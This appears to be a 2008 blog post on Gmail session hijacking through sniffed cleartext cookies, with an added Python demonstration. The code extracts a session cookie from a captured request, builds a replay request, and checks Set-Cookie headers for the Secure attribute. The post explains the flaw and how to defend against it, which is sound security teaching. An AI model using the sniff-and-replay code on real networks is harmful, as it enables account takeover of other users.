Friday, March 28, 2008

Do I smell Gmail cookies?

I have always wanted to know how session hijacking via cookie theft worked, so I decided to try it for myself on my home network. The vulnerability arises when a website uses a session cookie to validate a user's access to resources but only encrypts the initial login: after the user signs in over HTTPS, the browser sends the session cookie back and forth with every subsequent request in plaintext HTTP. Under these conditions an attacker on the same network can use a packet sniffer to capture the session cookie and replay it to gain access to the victim's account.

On my home network I was able to capture my Gmail session cookie using Wireshark. I was then able to reinsert it into a session on a different computer using WebScarab and gain access to my account without logging in. To make things worse, Gmail sessions never really time out unless you log out. Since many people store valuable information in their email, I feel this is a particularly dangerous vulnerability.

I think Gmail needs to encrypt the entire session. I don't think I will ever check my Gmail over an insecure network again. I am going to start using my mail client with SSL instead.
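To make the mechanism concrete, here is an added Python example (not code from the original post, nor from Wireshark or WebScarab) that does in a few functions what the sniff-then-reinsert workflow does by hand: parse a cleartext HTTP request as it appears on the wire, pull the Cookie header out of it, and build the replay request a second machine would send. It also checks Set-Cookie headers for the Secure attribute, which is the control that stops a browser from ever sending a cookie over plain HTTP. The captured request bytes, host, path and cookie names (SID, PREF, GX) are constructed for illustration and are not real Gmail traffic or values.

```python
"""
Added example (not from the original post): cleartext session cookie theft
and replay, plus the Set-Cookie check that would have prevented it.
All sample bytes, hosts, paths and cookie values are constructed.
"""
from http.cookies import SimpleCookie

# Constructed sample: a plaintext HTTP request as a sniffer would capture it
# after the user has already logged in over HTTPS. Values are made up.
SAMPLE_REQUEST = (
    b"GET /mail/?ui=2 HTTP/1.1\r\n"
    b"Host: mail.google.com\r\n"
    b"User-Agent: constructed-browser/1.0\r\n"
    b"Cookie: SID=constructed_session_value; PREF=ID=abc\r\n"
    b"\r\n"
)


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, headers).

    Header names are lower-cased so lookups do not depend on the client's
    capitalisation; values keep their original text.
    """
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def extract_cookies(raw: bytes) -> dict:
    """Return the cookies a sniffed request carried, as {name: value}.

    The Cookie request header is 'name=value; name=value'. Only the first
    '=' separates name from value, so values that themselves contain '='
    (PREF=ID=abc in the sample) survive intact.
    """
    _method, _path, headers = parse_http_request(raw)
    cookies = {}
    for part in headers.get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return cookies


def build_replay(host: str, path: str, cookies: dict) -> bytes:
    """Build the request a second machine sends to reuse the stolen session.

    This is the same thing as pasting the captured Cookie header into a
    proxy such as WebScarab: no credentials, just the cookie.
    """
    cookie_hdr = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: {cookie_hdr}\r\n"
        f"Connection: close\r\n\r\n"
    ).encode()


def insecure_cookies(set_cookie_headers) -> list:
    """Names of cookies set without the Secure attribute.

    A cookie without Secure is sent on plain HTTP requests too, which is
    exactly what lets a sniffer see it. Each argument is one Set-Cookie
    header value as the server sent it.
    """
    bad = []
    for hdr in set_cookie_headers:
        jar = SimpleCookie()
        jar.load(hdr)
        for name, morsel in jar.items():
            if not morsel["secure"]:
                bad.append(name)
    return bad


if __name__ == "__main__":
    stolen = extract_cookies(SAMPLE_REQUEST)
    print("captured cookies:", stolen)
    print(build_replay("mail.google.com", "/mail/?ui=2", stolen).decode())
    # Constructed Set-Cookie headers: SID lacks Secure, GX has it.
    print("cookies exposed to plaintext HTTP:",
          insecure_cookies(["SID=x; Path=/; HttpOnly",
                            "GX=y; Path=/; Secure; HttpOnly"]))
```

The practical check is the last function: if a site's session cookie comes back from the login response without the Secure attribute, the browser will attach it to any plain-HTTP request to that host, and the rest of the script is all an attacker on the same segment needs.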
